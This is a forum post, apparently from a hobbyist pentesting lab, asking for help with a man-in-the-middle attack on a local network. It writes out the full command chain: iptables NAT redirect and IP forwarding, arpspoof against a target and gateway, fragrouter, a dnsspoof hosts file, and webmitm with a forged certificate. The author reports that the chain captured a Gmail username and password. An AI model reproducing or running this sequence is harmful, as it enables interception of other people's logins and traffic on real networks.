heyas, it's i again. Weak-net labs set up a lot of machines here fro pentesting and security playing, and we can't seem to get our port forwarding working :S
i set up iptabes like so:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
from someone else's post, and the i tried:
fragrouter -B1 (worked)
arpspoof -t <ubuntu machine> <gateway's IP>
- and then
webmitm -d (and made a certificate)
when we go back to the ubuntu machine i see the certificate i made when i try to go to gmail, then when i try to login it gmail with user/pass it just hangs....
any suggestions? - thanx in advance - Weak-Net Labs.
i hate to reply to myself so fast but we have found something interesting...
i had to make a file (and define its full path) /root/dnspoof.hosts
dnsspoof -i eth0 -f /root/dnsspoof.hosts
then we ran:
arpspoof -i eth0 -t <targetIP> <GatewayIP>
fragrouter -i eth0 -B1
i guess the dd made it more verbose, i just accidentally pressed "d" 2x. heh
well, it still would NOT forward the victim machine passed the login screen, but we let it sit for a bout 5 minutes trying, and just gave up and figured we'd wait for help from you guys, then i saw in the terminal that was running "webmitm -dd" my username and password!! @CK! :S
still we are seriously confused.. - trev @ Weak-Net.
post script: the aforementioned hosts file was like so:
(where that was the attackers IP)